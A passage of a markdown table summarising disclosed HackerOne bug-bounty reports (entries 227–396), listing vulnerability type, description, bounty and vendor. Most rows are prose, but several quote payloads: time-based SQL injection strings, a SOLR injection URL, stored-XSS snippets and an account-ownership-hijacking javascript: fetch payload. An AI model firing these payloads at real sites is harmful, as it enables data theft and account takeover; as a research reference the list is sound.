| 227 | CSRF | Image injection on www.rockstargames.com/IV/screens/1280x720Image.html can be combined with other issues to leak user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/784101 |
| 228 | Information disclosure | Image injection on https://www.rockstargames.com/careers#/offices/. Combined in a chain with other attacks could lead to leaking user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/491654 |
| 229 | Insufficient Session Expiration | No session invalidation after logout. Attacker can reuse known tokens | $100 | Visma | https://hackerone.com/reports/808731 |
| 230 | Remote File Inclusion | Remote file inclusion through downloading file from chat. Uses path traversal to extract anywhere, and it can be hidden by setting a title for the file. | $5000 | Keybase | https://hackerone.com/reports/713006 |
| 231 | Insecure Design Principles | Using RTLO (Right to left override) character allows spoofing the URL that will be displayed when navigating out of rinkerboats.vanillacommunities.com leading to potential phishing / other attacks. | $150 | Vanilla | https://hackerone.com/reports/563268 |
| 232 | XSS | Stored XSS in the Customer Number field. | $250 | Visma | https://hackerone.com/reports/882189 |
| 233 | Information disclosure | CodeQL query to detect J2EE server having directory listing enabled, potentially allowing for source code disclosure. | $1800 | Github Security Lab | https://hackerone.com/reports/909374 |
| 234 | XSS | XSS in account.mail.ru due to unsafe handling of GET parameter (User-assisted == Requires user interaction?) | $1000 | Mail.ru | https://hackerone.com/reports/889874 |
| 235 | Information leak | MySQL credentials leaked to publicly available config file | $150 | Mail.ru | https://hackerone.com/reports/879389 |
| 236 | SSRF | SSRF through using the relap.io function allowing for fetching external resources, allowing access to the production network in a transparent manner. (Non-blind) | $1700 | Mail.ru | https://hackerone.com/reports/739962 |
| 237 | XSS | Stored XSS by authenticated user to all other users through the /wp-admin/edit.php?post_type=forum endpoint | $225 | Wordpress | https://hackerone.com/reports/881918 |
| 238 | Information leak | A misconfigured web directory disclosed files that showed NordVPNs public proxy list and corresponding port numbers | $50 | NordVPN | https://hackerone.com/reports/791826 |
| 239 | Privilege Escalation | An attacker can kick out any other member of any organization, given that they know the membership ID of the user. This is due to an IDOR in the delete membership functionality, which can be triggered by: DELETE /api/memberships/id |
$100 | Helium | https://hackerone.com/reports/810320 |
| 240 | Command Injection | Reflected XSS in certain endpoints allows account takeover. Attackers can also perform sensitive actions on behalf of authenticated users. | $594 | Ubiquiti Inc. | https://hackerone.com/reports/661647 |
| 241 | Command Injection | Certain end-points are vulnerable to command injection when using specifically crafted input, leading to RCE. This vulnerability can be triggered through other vulnerabilities, like XSS and CSRF. | $6839 | Ubiquiti Inc. | https://hackerone.com/reports/703659 |
| 242 | Logic bug | Bat files and other malicious executables (or any other filetypes and content) can be concealed as normal content, like .csv files by including illegal characters as content. | $1500 | Slack | https://hackerone.com/reports/833080 |
| 243 | XSS | XSS through unsafe URI handling in ASP.net on base starbucks.com domain | $500 | Starbucks | https://hackerone.com/reports/881115 |
| 244 | Bruteforce | User passwords can be brute forced due to lack of rate limiting | $700 | https://hackerone.com/reports/854424 | |
| 245 | Request Smuggling | console.helium.com is vulnerable to CL.TE request smuggling. | $500 | Helium | https://hackerone.com/reports/867952 |
| 246 | CSRF | CSRF allowing an attacker to import any novel to the victims chatstory (pixiv service) | $500 | Pixiv | https://hackerone.com/reports/534908 |
| 247 | Improper Authentication | 2FA bypass by not supplying a 2FA code. Likely lack of null check. Vulnerable request is likely something like this: "email":"attack@lol.com","2FA":"" |
$1000 | Glassdoor | https://hackerone.com/reports/897385 |
| 248 | Logic Bug | Users are able for forge requests, leading to being able to spawn additional units at will. This is done through (what looks like) a leaked secret and a lack of proper server side validation. | $1100 | InnoGames | https://hackerone.com/reports/802636 |
| 249 | Open Redirect | Open redirect requiring user to click in order to work | $100 | LocalTapiola | https://hackerone.com/reports/194017 |
| 250 | Insecure design principles | CodeQL query to check for improper SSL certificates | $1800 | GitHub | https://hackerone.com/reports/917454 |
| 251 | Command injection | CodeQL query to detect OGNL injection | $2300 | Github | https://hackerone.com/reports/917455 |
| 252 | Use after free | A use-after-free vulnerability exists in the IPV6 option of setsockopt, as it is possible to race and free the struct_ip6_pktopts buffer (TOCTOU) while it is being handled by ip6_setpktopt. This struct contains pointers that can be used for R/W primitives in the kernel. Combining this vulnerability with a known WebKit issue allows for easy exploitation. |
$10,000 | PlayStation | https://hackerone.com/reports/826026 |
| 253 | CSRF | /community/create-post.js was vulnerable to CSRF attacks, allowing an attacker to spam the community boards as other users. This attack was only possible through Chrome. |
$150 | Rockstar Games | https://hackerone.com/reports/487378 |
| 254 | CSRF | https://www.rockstargames.com/reddeadonline/feedback/submit.json was vulnerable to CSRF attacks and could be exploited through a remote server. This attack was only possible through Chrome. |
$150 | Rockstar Games | https://hackerone.com/reports/796295 |
| 255 | LFI | LFI of files with .md extension from /var/www/dashboard/new/ was possible. In addition, remote file inclusion from github was possible due to the default value of $docs_path, leading to XSS. |
$300 | TTS Bug Bounty | https://hackerone.com/reports/895972 |
| 256 | Logic Bug | Unlimited file upload in the image assigned to a contact leads to XSS by uploading malicious SVG. | $100 | Nextcloud | https://hackerone.com/reports/808287 |
| 257 | CRLF Injection | Malicious users (non-admins) can write to memcached when using a malicious URL as a share. | $100 | Nextcloud | https://hackerone.com/reports/592864 |
| 258 | HTTP Request Smuggling | CL.TE based request smuggling on api.zomato.com leading to account takeover among other issues. This issue was only reproducible when using the DELETE verb. As such, make sure to test for all HTTP verbs when checking for Request Smuggling | $5000 | Zomato | https://hackerone.com/reports/771666 |
| 259 | XSS | Reflected XSS on https://www.tumblr.com/abuse/start?prefill=<base64PL>. It only works on Firefox version 69 or lower. |
$250 | Automattic | https://hackerone.com/reports/915756 |
| 260 | Logic Bug | CodeQL query to detect insecure use of postMessage. It checks if indexOf or startsWith is used to check MessageEvent.origin, which can lead to XSS or other issues. | $1800 | GitHub | https://hackerone.com/reports/920285 |
| 261 | DoS | DoS by sending many requests to apply for a certain job, due to relying on responses from a 3rd party server before returning. | $100 | Maximum | https://hackerone.com/reports/892615 |
| 262 | Session Fixation | An issue where not all sessions being terminated when the password was reset. | $50 | Moneybird | https://hackerone.com/reports/743518 |
| 263 | Improper authentication | https://werkenbijderet.nl/vacature-alert endpoint did not have proper rate limiting implemented, leading to being able to send thousands of mails within 10 minutes. | $100 | Maximum | https://hackerone.com/reports/882942 |
| 264 | SSRF | Being able to call all internal classes, functions and parameters due to everything being declared public. This leads to blind SSRF through Gopher protocol. | $300 | TTS Bug Bounty | https://hackerone.com/reports/895696 |
| 265 | IDOR | Read only user can delete other users through IDOR | $50 | Helium | https://hackerone.com/reports/888729 |
| 266 | Brute Force | It is possible to brute force the login prompt of app.mopub.com due to only having IP based rate limiting. It should have CAPTCHA or block all access to the locked out account, not just add restrictions to the violating IP (as changing IPs is easy). |
$420 | https://hackerone.com/reports/819930 | |
| 267 | XSS | Reflected XSS in GET parameter | $300 | Mail.ru | https://hackerone.com/reports/848742 |
| 268 | Improper access control | A partner’s superuser account could access information of drivers belonging to other partners, including passport and drivers license data | $8000 | Mail.ru | https://hackerone.com/reports/863983 |
| 269 | Information leak | Bot Token for ICQ was leaked in GIT commit data for opensource JIRA plugin | $150 | Mail.ru | https://hackerone.com/reports/902064 |
| 270 | Logic bug | It was possible to create accounts with nicknames belonging to existing accounts | $150 | Mail.ru | https://hackerone.com/reports/824973 |
| 271 | XSS | Viewing a malicious SVG lead to access to local files (LFI?) on certain iOS versions due to cross-application scripting in the Mail.ru iOS Mail app | $1000 | Mail.ru | https://hackerone.com/reports/900543 |
| 272 | Race Condition | Malicious applications could create multiple valid OAUTH sessions by abusing a race condition. | $250 | Razer | https://hackerone.com/reports/699112 |
| 273 | IDOR | IDOR in the stocky application allows for changing columns of other users | $750 | Shopify | https://hackerone.com/reports/853130 |
| 274 | Account Takeover | If staff/the store owner has yet to register a google account to his Shopify ID, and you have privileges to change their registered email, you can take over the account by setting their email to your gmail address. Knowing this means you can takeover accounts by having the admin be exposed to an xss performing this operation. It only works with Google Apps enabled. | $2000 | Shopify | https://hackerone.com/reports/892904 |
| 275 | Improper authentication | The Stocky application did not have any permission checks to download purchase orders, leading to anyone being able to download the orders. | $500 | Shopify | https://hackerone.com/reports/802286 |
| 276 | CRLF Injection | In the Synthetics “Ping” functionality, you can insert newline characters, resulting in almost full control over the email functionality. You are able to send emails to anyone, with any content. The only limitation is a small one in the “Subject” field. | $500 | New Relic | https://hackerone.com/reports/347439 |
| 277 | IDOR | The selectAddressId in the cookie combined with the delivery_subzone in the GET request, allows for unauthenticated enumeration of all addresses registered to users. This cannot be tied to a specific user. This is due to the backend disclosing the full, stored address of a user, given that the delivery_subzone matches that associated with the selectAddressId without any further authentication |
$1500 | Zomato | https://hackerone.com/reports/514897 |
| 278 | Logic bug | Due to not sufficiently protecting which apps can retrieve the token in the authentication flow, it is possible for a malicious application to take over the account of the user. This requires a malicious app preinstalled on the victims device to be successful. | $500 | Shopify | https://hackerone.com/reports/855618 |
| 279 | Improper authentication | An attacker can generate app tokens through the adminGenerateSession mutation in the admin panel, as a staff member with no permissions. This would give access to a small subset of installed apps, limited to the current shop. |
$2000 | Shopify | https://hackerone.com/reports/898528 |
| 280 | XSS | Stored XSS in admin interface through “evaluation of purchase process”-window | $1500 | Mail.ru | https://hackerone.com/reports/874387 |
| 281 | DoS | Certain files in /etc/ are writable. For example hosts, hostname and resolve.conf. While the last two seems to have special handling, /etc/hosts is inherently vulnerable. This leads to being able to DoS a service by writing large amounts of data to the file. | $1000 | Kubernetes | https://hackerone.com/reports/867699 |
| 282 | Logic bug | GraphQL query for finding incorrect hostname comparison. This is especially prevalent in Android applications. | $1500 | GitHub | https://hackerone.com/reports/929288 |
| 283 | Logic bug | Misconfiguration lead to being able to get SmartDNS for free for longer than it should be. | $700 | NordVPN | https://hackerone.com/reports/925757 |
| 284 | XXE | XXE on starbucks.com.sg/RestAPI/* leading to arbitrary file read | $500 | Starbucks | https://hackerone.com/reports/762251 |
| 285 | Account Takeover | Due to improper authentication when setting up 2FA, it is possible to takeover an account given that you know the USER ID. This is not likely to leak and as such reduces the impact of this vulnerability. | $100 | Helium | https://hackerone.com/reports/810880 |
| 286 | Information Disclosure | It was possible to view thumbnails of private videos through attacking the API | $750 | Pornhub | https://hackerone.com/reports/138703 |
| 287 | DoS | Improper handling of renaming HackerOne groups for managing access rights for programs, leads to excessive resource use which may lead to DoS | $2500 | HackerOne | https://hackerone.com/reports/880187 |
| 288 | DoS | DoS through recursive evaluation. Can be done remotely by an attacker with elevated privileges. | $200 | Kubernetes | https://hackerone.com/reports/882923 |
| 289 | Logic bug | By tampering requests regarding which retailers you can earn cashback from to be an empty list, you can earn cashback from all retailers on the platform. Normally premium users can only select 6 and normal users can only select 3. This can only be set once, but using this vulnerability you can switch at any time. | $1000 | Curve | https://hackerone.com/reports/672487 |
| 290 | Use of weak PRNG | Grammarly Keyboard for Android used weak PRNG allowing a malicious app installed on the device to guess the PKCE code value and steal the OAUTH access token of a user. Fixed by changing to SecureRandom | $2000 | Grammarly | https://hackerone.com/reports/824931 |
| 291 | Improper Authentication | H1 SAML implementation allows for re-using SAML response for up to 10 minutes, allowing for increased risk in case an attacker can ever intercept or otherwise compromise such a request. | $500 | HackerOne | https://hackerone.com/reports/888930 |
| 292 | DoS | DoS of account (for Chrome) when viewing a tweet containing the link twitter.com/%00 | $560 | https://hackerone.com/reports/921286 | |
| 293 | IDOR | IDOR allows user to access pictures from other users, including EXIF data. | $200 | IRRCloud | https://hackerone.com/reports/906907 |
| 294 | Information leak | After the policy_markdown_html was added inside the team Graphql query, it was possible to enumerate if public programs also had private programs. In case they did, you could also see their internal policy. |
$2500 | HackerOne | https://hackerone.com/reports/877642 |
| 295 | Phishing | Ability to spoof interface elements through adding tags or attributes in calendar events at calendar.mail.ru | $150 | Mail.ru | https://hackerone.com/reports/847473 |
| 296 | Code injection | CodeQL query for detecting possible template injections in Python | $2300 | Github | https://hackerone.com/reports/944359 |
| 297 | XSS | By adding a link in a post and manually editing out a portion (denied:), then reblogging the post, the XSS will execute after the victim clicks the link (on the reblogged post). |
$350 | Automattic | https://hackerone.com/reports/882546 |
| 298 | Command Injection | Since GitLab allows for code injection through Mermaid, you can achieve arbitrary PUT requests in the context of the victim through this command injection. The victim has to have the required privilege to perform the action for the attack to succeed. | $3000 | Gitlab | https://hackerone.com/reports/824689 |
| 299 | SQLi | An SQL Injection existed in a Razer Gold asset due to using an outdated instance of PHPlist. The injection point is the body parameter name and not the value! | $2000 | Razer | https://hackerone.com/reports/824307 |
| 300 | Code injection | Due to a vulnerability in how the executable launched related executables, it was possible to escalate privileges by abusing this issue. (Likely similar to DLL injection or unquoted path issues.) The issue was in a Cortex related service. | $750 | Razer | https://hackerone.com/reports/769684 |
| 301 | IDOR | An alternate site shared database and cookie credentials with card.starbucks.com.sg. By exploiting the alternate site, the hacker could copy over the cookie value and take over the account on starbucks. |
$6000 | Starbucks | https://hackerone.com/reports/876300 |
| 302 | Command injection | AWS S3 bucket takeover of multiple buckets. The buckets were still referenced in a test script and as such could have resulted in RCE. | $12,500 | Mapbox | https://hackerone.com/reports/329689 |
| 303 | CSRF | Login CSRF via OATH code in lootdog.io allows an attacker to replace a user’s session with the attackers session. |
$150 | Mail.ru | https://hackerone.com/reports/892986 |
| 304 | DoS | Due to relying on AJV, and also using allErrors:true, Fastify is vulnerable to DoS when there is potentially slow matching patterns or if uniqueItems is in the schema. |
$250 | Node.js third-party modules | https://hackerone.com/reports/903521 |
| 305 | DoS | By submitting a very long password, the hashing algorithm on the server will take a lot of resources and potentially result in DoS due to memory exhaustion. | $100 | Nextcloud | https://hackerone.com/reports/840598 |
| 306 | Information Disclosure | Due to lack of access control in ajaxgetachievementsforgame, it is possible to see achievement names, display names and descriptions for unreleased games if you find a user who has the achievements for those unreleased apps (beta tester or similar) |
$750 | Valve | https://hackerone.com/reports/835087 |
| 307 | Open Redirect | Reverse tabnabbing (changing location of the original page page when opening a link in a new tab) was possible in the printing source document images functionality. | $100 | Visma Public | https://hackerone.com/reports/911123 |
| 308 | Client side enforcement of Server-side Security | Due to silently ignoring the content length header, it is possible to bypass the size check for S3 buckets and upload attachments of any size. The solution is to add content-length header to whitelisted headers. |
$500 | Ruby on Rails | https://hackerone.com/reports/789579 |
| 309 | Logic bug | When creating a hash, the permit function does not sufficiently protect when converting using .each(), allowing for sneaking in additional parameters that should not logically be present |
$500 | Ruby on Rails | https://hackerone.com/reports/292797 |
| 310 | Null pointer dereference | A lack of proper checks for user supplied data results in a null pointer dereference. | $1500 | Open-Xchange | https://hackerone.com/reports/827729 |
| 311 | Use After Free | Due to incorrectly decreasing a reference counter, by sending a lot of newline characters (“\n”) you can reach code checking the cmd-variable which has previously been freed. |
$500 | Open-Xchange | https://hackerone.com/reports/827051 |
| 312 | IDOR | Account takeover through IDOR in password recovery procedure | $1500 | Mail.ru | https://hackerone.com/reports/843160 |
| 313 | IDOR | Could disclose attributes of arbitrary sites due to a IDOR in relap.io |
$750 | Mail.ru | https://hackerone.com/reports/749887 |
| 314 | XSS | By uploading a PNG with JS and XML code, and adding it to a Wiki page, it was possible to achieve stored XSS | $1500 | GitLab | https://hackerone.com/reports/880099 |
| 315 | Improper Access Control | Lack of access control on the ListMembers query allowed for enumeration of members in private lists. Finding the TwitterID is difficult, but can be done by brute force by attacking different endpoints. To further show impact, it was demonstrated that x-response-time header discloses if the lists exists or not. |
$2940 | https://hackerone.com/reports/885539 | |
| 316 | XSS | Stored XSS through the blob-viewer. The payload is in the description field. | $2000 | GitLab | https://hackerone.com/reports/806571 |
| 317 | SSRF | Chaining redirects in grafana allows for SSRF using any HTTP verb to any arbitrary endpoint. For more information, see Rhynorater’s talk at HactivityCon 2020. | $12,000 | GitLab | https://hackerone.com/reports/878779 |
| 318 | Logic bug | By supplying an attacker controlled link, the attacker can get a copy of the PoC, if the victim (person creating a poc) submits the details on the page. There were multiple bypasses possible due to a loosely configured regex, which was fixed. | $1000 | BugPoc | https://hackerone.com/reports/926221 |
| 319 | Logic bug | Due to lack of association checks between 3rd party wallet IDs and user IDs, it was possible to purchase Zomato Gold memberships using other user’s 3rd party wallets, effectively having them pay for it. | $2000 | Zomato | https://hackerone.com/reports/938021 |
| 320 | Logic bug | Ability to decrease payment by maximum 1 currency unit (0.99) for any purchase | $150 | Zomato | https://hackerone.com/reports/927661 |
| 321 | Improper access control | Access control issue due to not correctly checking permissions in the active session for the user | $100 | Visma Public | https://hackerone.com/reports/812143 |
| 322 | Information leak | Ability to see error message related to character encoding from SQL operation by adding the poop-emoji to the email field during registration | $100 | Unikrn | https://hackerone.com/reports/866271 |
| 323 | SQL Injection | SOLR injection through adding \to the query. |
$100 | Zomato | https://hackerone.com/reports/844428 |
| 324 | SQL Injection | Blind SQLi in res_id of /php/geto2banner. PoC is res_id=51-CASE/**/WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END&city_id=0 |
$2000 | Zomato | https://hackerone.com/reports/838855 |
| 325 | SQL Injection | Same as #326, but on a different endpoint: /php/widgets_handler.php. PoC: :/php/widgets_handler.php?method=getResWidgetButton&res_id=51-CASE/**/WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END |
$2000 | Zomato | https://hackerone.com/reports/836079 |
| 326 | Improper access control | The food.grammarly.io site uses Meter framework, and is lacking proper authorization for sensitive endpoints. The attacker could leak user data and employee data, including access tokens, by calling the functions directly from JS (for example in dev tools) | $1000 | Grammarly | https://hackerone.com/reports/745495 |
| 327 | SQL Injection | The reporter identified a SOLR injection on the user_id parameter at :/v2/leaderboard_v2.json. This had low impact, but the internal team found a boolean based blind SQLi in the same codebase when investigating and rewarded the report as such. |
$2000 | Zomato | https://hackerone.com/reports/952501 |
| 328 | Special element injection | SOLR injection similar to #324, but on a different endpoint. PoC :v2/red/homepage.json?lat=&lon=&city_id={!dismax+df=city_id}86&android_country=US&lang=en&android_language=en |
$150 | Zomato | https://hackerone.com/reports/953203 |
| 329 | Missing authorization | Missing authorization checks lead to a user only allowed to do sales being able to record payments he was not supposed to | $250 | Visma Public | https://hackerone.com/reports/919008 |
| 330 | SSRF | CodeQL query for detecting SSRF issues in Golang libraries and code | $1800 | Github Security lab | https://hackerone.com/reports/956296 |
| 331 | LDAP Injection | CodeQL query for detecting LDAP injections in Java, supporting Java JNDI, UnboundID, SPring LDAP and Apache LDAP API | $2500 | Github Security lab | https://hackerone.com/reports/956295 |
| 332 | XSS | Stored XSS through the chartbuilder in one.newrelic.com. Payload: SELECT '“><img src=x onerror=alert(document.domain)> "' Style=position\' FROM SyntheticCheck |
$2500 | New Relic | https://hackerone.com/reports/634692 |
| 333 | Information leak | Able to view full name of users who are not yet part of your account. This can be achieved by creating a note, viewing it and trying to share it with the invited account. | $750 | New Relic | https://hackerone.com/reports/476958 |
| 334 | Privilege escalation | Restricted users are able to delete Key transaction tags through the GUI even though they should only have READ-access. | $750 | New Relic | https://hackerone.com/reports/638685 |
| 335 | Privilege escalation | An unrestricted user is able to view the application token for a mobile app by directly visiting the /deploy endpoint for the app. |
$500 | New Relic | https://hackerone.com/reports/479139 |
| 336 | IDOR | Access to a subset of a victims Insights Dashboards through a GraphQL query with insufficient validation | $1500 | New Relic | https://hackerone.com/reports/765565 |
| 337 | Logic bug | Ability to buy PRO subscriptions for reduced prices by tampering the pr. unit price | $203.5 | New Relic | https://hackerone.com/reports/783688 |
| 338 | Improper access control | Restricted users are able to delete NerdStorage documents created/owned by any user on that account, through GraphQL query. | $600 | New Relic | https://hackerone.com/reports/766145 |
| 339 | Improper access control | A restricted user was able to update the Aodex target for an application by abusing a GraphQL mutation without proper validation and authorization | $626 | New Relic | https://hackerone.com/reports/776449 |
| 340 | Violation of secure design principles | It was not possible to delete API keys in the application, even though the GUI said it was possible and the action succeeded. This was true even for users with an Admin/Owner role. | $500 | New Relic | https://hackerone.com/reports/782703 |
| 341 | Code injection | By abusing a CSRF vulnerability in the admin panel, the reporters were able to achieve stored XSS. Then, using the stored XSS vulnerability, they managed to escalate the vulnerability to RCE. The attack required Social Engineering of a Wordpress Admin (to click the initial link) to be successful | $506 | New Relic | https://hackerone.com/reports/941421 |
| 342 | Improper access control | A test endpoint for Synthetic monitors was found by the reporter. It did not validate permissions of the user, causing low privileged users to be able to create monitors using Secure Credentials | $500 | New Relic | https://hackerone.com/reports/788499 |
| 343 | IDOR | The reporter found a way to link an account with any Partnership as long as the ID was known. It was resolved by adding proper validation. | $695 | New Relic | https://hackerone.com/reports/786109 |
| 344 | XSS | Stored XSS in the Synthetics private locations list. Both the Label and Description fields were vulnerable. PoC: </script><script>alert(document.domain)</script> |
$2500 | New Relic | https://hackerone.com/reports/680240 |
| 345 | Improper access control | Restricted users are able to create, edit and remove tags from the NerdGraph entities. | $750 | New Relic | https://hackerone.com/reports/757957 |
| 346 | XSS | Stored XSS in the “Position” field when applying for “Support/Moderator” jobs at recruit.innogames.de | $500 | Innogames | https://hackerone.com/reports/917250 |
| 347 | IDOR | An endpoint for testing Synthetics monitors without proper validation allowed monitors from other accounts to run on your account, given that they knew the monitors ID (on victims account) | $2500 | New Relic | https://hackerone.com/reports/787886 |
| 348 | XSS | Stored XSS across accounts through the embedded charts page. The vulnerable field is chart_title and the PoC is: </script><script>alert(document.domain)</script>. Multiple bypasses was also found for this issue |
$3625 | New Relic | https://hackerone.com/reports/709883 |
| 349 | XSS | Stored XSS in the transactionName field of the Beta map functionality. PoC is a simple "-alert(document.domain)-" |
$2500 | New Relic | https://hackerone.com/reports/667770 |
| 350 | XSS | Cross account stored XSS by injecting the payload into a chart, when it is displayed inside a note. The exploit abuses the href attribute by using a javascript:alert()" payload. This XSS requires no user interaction. |
$4250 | New Relic | https://hackerone.com/reports/507132 |
| 351 | Improper access control | There was a misconfiguration in CORS-policy where all assets trusted the domain nr3.nr-assets.net where users can upload arbitrary content. (For example Nerdlet artifacts) This allows an attacker to upload malicious files of arbitrary types and execute arbitrary actions on behalf of the victim in various ways due to the incorrect configuration. Valid fixes are either to move user content to another sandbox domain or to amend the CORS policy. |
$3125 | New Relic | https://hackerone.com/reports/751699 |
| 352 | Information disclosure | CORS misconfiguration allows requests from sandbox containing user apps, leading to potential disclosure of nerdpacks, nerdlets, and launcher ID’s, and also source code of the victims app. | $625 | New Relic | https://hackerone.com/reports/746786 |
| 353 | XSS | Stored XSS in admin interface when creating a new alert. By formatting the url as: user:password@domain.com the server accepts the payload, which is: javascript:fetch("https://rpm.newrelic.com/user_management/accounts/{ACCOUNT_ID}/update_primary_admin?value={ATTACKER_ID}",{method:"PUT",headers:{"X-Requested-With":"XMLHttpRequest"}}).then(function(_){alert("you_have_lost_your_ownership");close()})//@asd.com |
$1337 | New Relic | https://hackerone.com/reports/605845 |
| 354 | Memory Corruption | Missing best practices like having ASLR (Address Space Layout Randomization), DEP (Data Execution Prevention) and CFG (Control Flow Guard) enabled is lacking | $50 | Nextcloud | https://hackerone.com/reports/380102 |
| 355 | DoS | Denial of Service by poisoning the cache with invalid CORS Header, due to an endpoint echoing back and setting the CORS Allow-OriginHeader to the supplied “origin” value. |
$200 | Automattic | https://hackerone.com/reports/921704 |
| 356 | XSS | When connecting to an invalid website, it launches a pop-up which can contain attacker-controlled content. By using file-scheme, for example, you can trick users into launching arbitrary files on the local machine | $100 | Nextcloud | https://hackerone.com/reports/685552 |
| 357 | Path Traversal | The linux client is vulnerable to an attack where an administrator can inject path traversal payloads into filenames (../) in order to write files to arbitrary locations within the control of the nextcloud app, on the victims machine. It only allows for creating new files, not modify existing ones, and needs to be continously exploited to have effect. | $250 | Nextcloud | https://hackerone.com/reports/590319 |
| 358 | SSRF | SSRF in PlantUML staging server, due to accepting the !include function. |
$100 | GitLab | https://hackerone.com/reports/689245 |
| 359 | XSS | Stored XSS due to improper filtering of attributes after admin has edited them. | $650 | WordPress | https://hackerone.com/reports/633231 |
| 360 | XSS | Stored XSS due to improper filtering of attributes after admin has edited them. Different case from #359 | $650 | WordPress | https://hackerone.com/reports/497724 |
| 361 | XSS | Stored XSS in First and Last Name field for “Staff” account | $3000 | Shopify | https://hackerone.com/reports/948929 |
| 362 | Privilege Escalation | An attacker can register an account with an email, get permissions and then be deleted. After being deleted, by accessing accounts.shopify.com with the now deleted account, you still have access. |
$1000 | Shopify | https://hackerone.com/reports/870001 |
| 363 | Information disclosure | A bug in graphql access controlled allowed an attacker with “customer” permissions to leak additional data they should not have access to, from orders. | $1500 | Shopify | https://hackerone.com/reports/882412 |
| 364 | Information disclosure | By first getting an API key, then querying for specific data, staff members can access data they are not supposed to have access to. | $1000 | Shopify | https://hackerone.com/reports/901775 |
| 365 | Information disclosure | Users without any permission can access certain store information through GraphQL query. | $500 | Shopify | https://hackerone.com/reports/409973 |
| 366 | XSS | Reflected XSS through the skuNo & skuImgUrl parameters at https://www.istarbucks.co.kr/app/getGiftStock.do |
$250 | Starbucks | https://hackerone.com/reports/768345 |
| 367 | Improper access control | Password reset link can be used to reset password multiple times. | $500 | Shopify | https://hackerone.com/reports/898841 |
| 368 | IDOR | The last 4 digits of a registered credit card could be obtained through error messages on the /profile_payment/saveendpoint by abusing an IDOR |
$500 | Yelp | https://hackerone.com/reports/361984 |
| 369 | IDOR | An IDOR allowed an attacker to order food on GrubHub by using someone elses credit card on the /checkout/transaction_platform endpoint. |
$2500 | Yelp | https://hackerone.com/reports/391092 |
| 370 | IDOR | An IDOR on the /rewards/signup endpoint allowed an attacker to associate a random credit card to their account. While it could not be used. it allowed for viewing the transaction history and cash back amounts received |
$2000 | Yelp | https://hackerone.com/reports/358143 |
| 371 | Stack overflow | Half Life 1 allows taking arguments from command-line to launch a mod/specific game. This is done through -game <arg>. The argument is copied using strcopy resulting in an overflow being possible. |
$1150 | Valve | https://hackerone.com/reports/832750 |
| 372 | Buffer Overflow | By loading a malicious map-file (.bsp) an attacker can achieve RCE on any victim, if they load the map. This works on any GoldSrc game | $450 | Valve | https://hackerone.com/reports/763403 |
| 373 | Buffer Overflow | The spk console command has no length check before copying it into a stack based buffer, leading to being able to achieve RCE by having a victim load a malicious .cfg file. | $350 | Valve | https://hackerone.com/reports/769014 |
| 374 | IDOR | An IDOR when creating shipping labels allows an attacker to request print labels (and I assume see the information related to the order) for stores he does not have access to. | $1000 | Shopify | https://hackerone.com/reports/884159 |
| 375 | Improper authentication | The getLoginStatus call in Digits allows an attacker to retrieve OAuth Credentials for any account, due to improperly verifying domains by utilizing the referer header. If this header was empty, the application considered the request valid, which was the issue. |
$5040 | https://hackerone.com/reports/168116 | |
| 376 | Information disclosure | CodeQL query to detect logging of potentially sensitive information in JS based applications | $1800 | Github Security Lab | https://hackerone.com/reports/963816 |
| 377 | Information disclosure | CodeQL query to detect basic authentication over HTTP in java.net and Apache HttpClient libraries. This is vulnerable due to basic auth only using base64 encoding and being easily reversible. | $2300 | Github Security Lab | https://hackerone.com/reports/963815 |
| 378 | DoS | Lodash V.4.17.15 was vulnerable to prototype pollution, allowing for potential DoS. | $250 | NodeJS 3rd party modules | https://hackerone.com/reports/864701 |
| 379 | Privacy Violation | Clickjacking was possible during the payment process, leading to an attacker being able to trick the victim into paying for items using their stored credit card. | $400 | Yelp | https://hackerone.com/reports/391385 |
| 380 | UI Redressing (Clickjacking) | Multiple endpoints were vulnerable to clickjacking. | $500 | Yelp | https://hackerone.com/reports/305128 |
| 381 | UI Redressing (Clickjacking) | Clickjacking was possible on the /reservations endpoint, possibly allowing an attacker to leak information of a victim or incurring monetary loss for the victim |
$500 | Yelp | https://hackerone.com/reports/355859 |
| 382 | Information disclosure | It is possible to disclose all details about all pentesters invited to a test, regardless if they accepted or not. This allows leaking sensitive information. | $500 | HackerOne | https://hackerone.com/reports/958374 |
| 383 | XSS | Stored XSS through the dashboard builder within New Relic One. | $2500 | New Relic | https://hackerone.com/reports/626082 |
| 384 | Privilege Escalation | Synthetics did not have the matching permissions compared to other functionality, allowing for users to have higher privileges than intended. | $750 | New Relic | https://hackerone.com/reports/387290 |
| 385 | Privilege Escalation | Due to changing to use Zuora for managing customer subscriptions, members who do not have such access through the New Relic platform, can access the information through the Zoura API. | $900 | New Relic | https://hackerone.com/reports/501672 |
| 386 | XSS | Stored XSS via role name in JSON chart, which was part of a prerelease UI. Payload was: /*\"<sVg/oNloAd=alert(document.domain)//>\x3e |
$2500 | New Relic | https://hackerone.com/reports/520630 |
| 387 | Improper authentication | Restricted users were able to delete filter sets used by admin users in ` https://infrastructure.newrelic.com/accounts//settings/filterSets` | $250 | New Relic | https://hackerone.com/reports/202501 |
| 388 | Privilege escalation | By being invited as a staff member and becoming a partner, then revoking said permission, the previous account still has access to the partner store (? Hard to understand from report) | $1500 | Shopify | https://hackerone.com/reports/911857 |
| 389 | XSS | It is possible to achieve stored XSS when creating a menu item. The XSS fires when you try to delete said item. | $1000 | Shopify | https://hackerone.com/reports/887879 |
| 390 | Information disclosure | Staff members with No Permission could not access data through web, but by using the Android application the member can access Order Details via the exchangeReceiptSend call |
$1000 | Shopify | https://hackerone.com/reports/917875 |
| 391 | Privilege escalation | A malicious admin can create additional admin accounts without notifying / it being visible to other admins. | $500 | Shopify | https://hackerone.com/reports/962895 |
| 392 | Path traversal | It is possible to use path traversal in order to access arbitrary paths on the OAuth app as an anonymous user | $500 | Shopify | https://hackerone.com/reports/869888 |
| 393 | Violation of secure design principles | If you change country information in Account settings, hackerone does not send you a “Your profile was recently changed” notification email. | $500 | Hackerone | https://hackerone.com/reports/961841 |
| 394 | Information disclosure | By fetching a valid token from another store, it was possible to bypass the password-restriction on stores in preview mode. | $1500 | Shopify | https://hackerone.com/reports/961929 |
| 395 | XSS | By setting the name of the folder containing a broken theme to a XSS payload, XSS can be achieved. This requires installing an attacker-supplied theme or write-access to the file system. | $300 | WordPress | https://hackerone.com/reports/406289 |
| 396 | XSS | Self-xss on Timeline by using javascript: protocol |
$500 | Shopify | https://hackerone.com/reports/854299 |
